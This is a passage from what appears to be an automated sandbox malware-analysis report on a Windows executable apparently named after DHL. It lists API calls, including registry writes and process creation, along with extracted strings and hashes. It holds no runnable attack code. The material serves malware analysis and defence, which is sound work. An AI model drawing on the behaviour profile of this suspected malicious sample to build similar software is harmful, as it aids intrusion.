                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00A2C6B2
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00A2C7C1
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00A2C84D
                                                        • RegCloseKey.ADVAPI32(?), ref: 00A2C881
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A2C88E
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00A2C960
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 9721498-966354055
                                                        • Opcode ID: 1670e662c1abf4362116e20d5c806e854e44fc31714569b376bdc6f1d0ec08c0
                                                        • Instruction ID: a53df75d7c518be44b53ec3dc87f971b7a01ead6b29ac0db78948c0d40a55d20
                                                        • Opcode Fuzzy Hash: 1670e662c1abf4362116e20d5c806e854e44fc31714569b376bdc6f1d0ec08c0
                                                        • Instruction Fuzzy Hash: 851238356042119FDB14EF18D891B2EB7E5EF89724F14886CF84A9B3A2DB31ED41CB81
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00A309C6
                                                        • _wcslen.LIBCMT ref: 00A30A01
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A30A54
                                                        • _wcslen.LIBCMT ref: 00A30A8A
                                                        • _wcslen.LIBCMT ref: 00A30B06
                                                        • _wcslen.LIBCMT ref: 00A30B81
                                                          • Part of subcall function 009BF9F2: _wcslen.LIBCMT ref: 009BF9FD
                                                          • Part of subcall function 00A02BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A02BFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 1103490817-4258414348
                                                        • Opcode ID: b4df34d32c52f9dee9bf067d2142fd405462b16695d938dbcf4399d7e62fa7db
                                                        • Instruction ID: 8ca7d4fa3c17c0d2b0c47f66a72daf0d0e49aea6e66f3a5afa9cb4f3f594e910
                                                        • Opcode Fuzzy Hash: b4df34d32c52f9dee9bf067d2142fd405462b16695d938dbcf4399d7e62fa7db
                                                        • Instruction Fuzzy Hash: E5E188316083019FCB14EF24C461E2AB7E1BF99758F14895CF8969B3A2D731ED45CB81
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 1256254125-909552448
                                                        • Opcode ID: b0c181399fa2234ae91687ac332accbcf325e231ffe4fb16a26a786acf0ad163
                                                        • Instruction ID: 74041d39c8c66701150a615541d20edfe976d3612887e8d0a8067a5be5596744
                                                        • Opcode Fuzzy Hash: b0c181399fa2234ae91687ac332accbcf325e231ffe4fb16a26a786acf0ad163
                                                        • Instruction Fuzzy Hash: 1671E732A1053A8BCB20DF7CED516BF33A2AFA17B4B254538F8569B284E635CD45C391
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00A3835A
                                                        • _wcslen.LIBCMT ref: 00A3836E
                                                        • _wcslen.LIBCMT ref: 00A38391
                                                        • _wcslen.LIBCMT ref: 00A383B4
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A383F2
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A35BF2), ref: 00A3844E
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A38487
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A384CA
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A38501
                                                        • FreeLibrary.KERNEL32(?), ref: 00A3850D
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A3851D
                                                        • DestroyIcon.USER32(?,?,?,?,?,00A35BF2), ref: 00A3852C
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A38549
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A38555
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                        • String ID: .dll$.exe$.icl
                                                        • API String ID: 799131459-1154884017
                                                        • Opcode ID: 718276cc7310d3b698a31cb67112638f6093a4de7f0ec27cbdbb0142dfea58ec
                                                        • Instruction ID: d6241f9758dade57683646daea973cda5118cb454f58594dfb67fab300037014
                                                        • Opcode Fuzzy Hash: 718276cc7310d3b698a31cb67112638f6093a4de7f0ec27cbdbb0142dfea58ec
                                                        • Instruction Fuzzy Hash: 8B61C171A40315BEEB14DF64DC45FBE77A8BB48B21F104609F815EA1D1DB78A981C7A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 0-1645009161
                                                        • Opcode ID: 3cbec3d61a9d0c1eab8b6d1d78504f337f0ea10592dedad936f4bbbf3f6a2401
                                                        • Instruction ID: 5029ec720a341d7d5b728bbda0cbd699ffcd26501053f5f45e101aaeb70a6164
                                                        • Opcode Fuzzy Hash: 3cbec3d61a9d0c1eab8b6d1d78504f337f0ea10592dedad936f4bbbf3f6a2401
                                                        • Instruction Fuzzy Hash: 3881CD71A04205BBDB21BFA4DC43FABB7A8AF96300F044424F905AB196EB74DA01D7E1
                                                        APIs
                                                        • LoadIconW.USER32(00000063), ref: 00A05A2E
                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A05A40
                                                        • SetWindowTextW.USER32(?,?), ref: 00A05A57
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00A05A6C
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00A05A72
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00A05A82
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00A05A88
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A05AA9
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A05AC3
                                                        • GetWindowRect.USER32(?,?), ref: 00A05ACC
                                                        • _wcslen.LIBCMT ref: 00A05B33
                                                        • SetWindowTextW.USER32(?,?), ref: 00A05B6F
                                                        • GetDesktopWindow.USER32 ref: 00A05B75
                                                        • GetWindowRect.USER32(00000000), ref: 00A05B7C
                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00A05BD3
                                                        • GetClientRect.USER32(?,?), ref: 00A05BE0
                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00A05C05
                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A05C2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                        • String ID:
                                                        • API String ID: 895679908-0
                                                        • Opcode ID: d5667a47468525d8ce58469373a4e25d8cf2f3b011c640d92e02a225d20b0b80
                                                        • Instruction ID: 87d67c6e8d89e7295bf57a27317a8e1ea96352b14685591cfbc385c502e57f88
                                                        • Opcode Fuzzy Hash: d5667a47468525d8ce58469373a4e25d8cf2f3b011c640d92e02a225d20b0b80
                                                        • Instruction Fuzzy Hash: DB713931A00A09AFDB20DFB8DE8AAAFBBF5FF48714F104518E542A25A0D775E945CF50
                                                        APIs
                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009C00C6
                                                          • Part of subcall function 009C00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00A7070C,00000FA0,7C2D64ED,?,?,?,?,009E23B3,000000FF), ref: 009C011C
                                                          • Part of subcall function 009C00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009E23B3,000000FF), ref: 009C0127
                                                          • Part of subcall function 009C00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009E23B3,000000FF), ref: 009C0138
                                                          • Part of subcall function 009C00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 009C014E
                                                          • Part of subcall function 009C00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009C015C
                                                          • Part of subcall function 009C00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009C016A
                                                          • Part of subcall function 009C00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009C0195
                                                          • Part of subcall function 009C00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009C01A0
                                                        • ___scrt_fastfail.LIBCMT ref: 009C00E7
                                                          • Part of subcall function 009C00A3: __onexit.LIBCMT ref: 009C00A9
                                                        Strings
                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 009C0122
                                                        • kernel32.dll, xrefs: 009C0133
                                                        • WakeAllConditionVariable, xrefs: 009C0162
                                                        • SleepConditionVariableCS, xrefs: 009C0154
                                                        • InitializeConditionVariable, xrefs: 009C0148
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                        • API String ID: 66158676-1714406822
                                                        • Opcode ID: 8a8c0cfd3e0f10c99c7d6fb338c52e749f4fb92f21c410d016e0304c52ea3bac
                                                        • Instruction ID: c5a1f150d01331e04ddec4b027bd857207477625beaf7ad27ba6dc188f5bdaae
                                                        • Opcode Fuzzy Hash: 8a8c0cfd3e0f10c99c7d6fb338c52e749f4fb92f21c410d016e0304c52ea3bac
                                                        • Instruction Fuzzy Hash: 1621DA32E44710FFE7119BE4AC09F6977A8EB85FA5F04452DF805A3691DB749C008B51
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 176396367-1603158881
                                                        • Opcode ID: a97b8ecb28113726305fd2e8a5151475ed1be4433ae849a596006ee19cbdf857
                                                        • Instruction ID: e43ad1d38c7e22060b1e7c630f46f2dc318d24c36db524ec5ed2cd0db89b332d
                                                        • Opcode Fuzzy Hash: a97b8ecb28113726305fd2e8a5151475ed1be4433ae849a596006ee19cbdf857
                                                        • Instruction Fuzzy Hash: 4CE1A533E0051AAFCF149F78D891BEEBBB8BF54750F548119E456B7290DB30AE458790
                                                        APIs
                                                        • CharLowerBuffW.USER32(00000000,00000000,00A3CC08), ref: 00A14527
                                                        • _wcslen.LIBCMT ref: 00A1453B
                                                        • _wcslen.LIBCMT ref: 00A14599
                                                        • _wcslen.LIBCMT ref: 00A145F4
                                                        • _wcslen.LIBCMT ref: 00A1463F
                                                        • _wcslen.LIBCMT ref: 00A146A7
                                                          • Part of subcall function 009BF9F2: _wcslen.LIBCMT ref: 009BF9FD
                                                        • GetDriveTypeW.KERNEL32(?,00A66BF0,00000061), ref: 00A14743
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2055661098-1000479233
                                                        • Opcode ID: dc4c656d0588993f9ed47521e6405259b18f7f4e6cf91e87d27ae65232ebb828
                                                        • Instruction ID: fbb80558d18adca32af590a591310929a1cb57e7c56e580fb8d74ea1b7738b75
                                                        • Opcode Fuzzy Hash: dc4c656d0588993f9ed47521e6405259b18f7f4e6cf91e87d27ae65232ebb828
                                                        • Instruction Fuzzy Hash: FFB1BD716083129FC710DF2CC890AAAB7E5AFEA764F50491DF4A6C7291D730DC85CBA2
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00A2B198
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A2B1B0
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A2B1D4
                                                        • _wcslen.LIBCMT ref: 00A2B200
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A2B214
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A2B236
                                                        • _wcslen.LIBCMT ref: 00A2B332
                                                          • Part of subcall function 00A105A7: GetStdHandle.KERNEL32(000000F6), ref: 00A105C6
                                                        • _wcslen.LIBCMT ref: 00A2B34B
                                                        • _wcslen.LIBCMT ref: 00A2B366
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A2B3B6
                                                        • GetLastError.KERNEL32(00000000), ref: 00A2B407
                                                        • CloseHandle.KERNEL32(?), ref: 00A2B439
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A2B44A
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A2B45C
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A2B46E
                                                        • CloseHandle.KERNEL32(?), ref: 00A2B4E3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 2178637699-0
                                                        • Opcode ID: f2ebd3138f55190fd784b41b801e6dba6bf0d8ca8142b97bfd20077c40a88b4c
                                                        • Instruction ID: a553e90b227645c39315c47edd951adc06b96bdc55e22de95dd04807a0a59223
                                                        • Opcode Fuzzy Hash: f2ebd3138f55190fd784b41b801e6dba6bf0d8ca8142b97bfd20077c40a88b4c
                                                        • Instruction Fuzzy Hash: C8F19F31518310DFC714EF28D891B6EBBE5AF85710F14856DF8959B2A2DB31EC40CBA2
                                                        APIs
                                                        • GetMenuItemCount.USER32(00A71990), ref: 009E2F8D
                                                        • GetMenuItemCount.USER32(00A71990), ref: 009E303D
                                                        • GetCursorPos.USER32(?), ref: 009E3081
                                                        • SetForegroundWindow.USER32(00000000), ref: 009E308A
                                                        • TrackPopupMenuEx.USER32(00A71990,00000000,?,00000000,00000000,00000000), ref: 009E309D
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009E30A9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                        • String ID: 0
                                                        • API String ID: 36266755-4108050209
                                                        • Opcode ID: 579ea66ae6a2eccdca0daaf006cd54b48b23fd5efae8f485e3091eabc2d12418
                                                        • Instruction ID: be36fdc786203eb5e15338878a74b728a8d3474330cc6614802da50408b50f09
                                                        • Opcode Fuzzy Hash: 579ea66ae6a2eccdca0daaf006cd54b48b23fd5efae8f485e3091eabc2d12418
                                                        • Instruction Fuzzy Hash: A9711731640255BEEB228F65CC49FAABF6CFF05324F208216F9246A1E1C7B1AD50CB90
                                                        APIs
                                                        • DestroyWindow.USER32(?,?), ref: 00A36DEB
                                                          • Part of subcall function 009A6B57: _wcslen.LIBCMT ref: 009A6B6A
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A36E5F
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A36E81
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A36E94
                                                        • DestroyWindow.USER32(?), ref: 00A36EB5
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,009A0000,00000000), ref: 00A36EE4
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A36EFD
                                                        • GetDesktopWindow.USER32 ref: 00A36F16
                                                        • GetWindowRect.USER32(00000000), ref: 00A36F1D
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A36F35
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A36F4D
                                                          • Part of subcall function 009B9944: GetWindowLongW.USER32(?,000000EB), ref: 009B9952
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                        • String ID: 0$tooltips_class32
                                                        • API String ID: 2429346358-3619404913
                                                        • Opcode ID: 082e4404919c2bb01894310325b7cb734dc54139fb4e468bcdccae2c07831d93
                                                        • Instruction ID: 4683bd54592ecd5ec86dd3dc043a50e1f7ff01758ce67f73ba35fdce001f96ea
                                                        • Opcode Fuzzy Hash: 082e4404919c2bb01894310325b7cb734dc54139fb4e468bcdccae2c07831d93
                                                        • Instruction Fuzzy Hash: 74717874104240AFDB21CF58DC44FAABBF9FB89314F14881DFA9997261C774E94ACB21
                                                        APIs
                                                          • Part of subcall function 009B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009B9BB2
                                                        • DragQueryPoint.SHELL32(?,?), ref: 00A39147
                                                          • Part of subcall function 00A37674: ClientToScreen.USER32(?,?), ref: 00A3769A
                                                          • Part of subcall function 00A37674: GetWindowRect.USER32(?,?), ref: 00A37710
                                                          • Part of subcall function 00A37674: PtInRect.USER32(?,?,00A38B89), ref: 00A37720
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A391B0
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A391BB
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A391DE
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A39225
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A3923E
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00A39255
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00A39277
                                                        • DragFinish.SHELL32(?), ref: 00A3927E
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A39371
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                        • API String ID: 221274066-3440237614
                                                        • Opcode ID: 9d78a6cec9adcaed3dc64019caa26ca368fddd94ea78999c864bf75f9087b7b1
                                                        • Instruction ID: 2a8f66402ed9f66f250678fe049c1a8f00f475e6fbe5816d4bf5a99437f5abaa
                                                        • Opcode Fuzzy Hash: 9d78a6cec9adcaed3dc64019caa26ca368fddd94ea78999c864bf75f9087b7b1
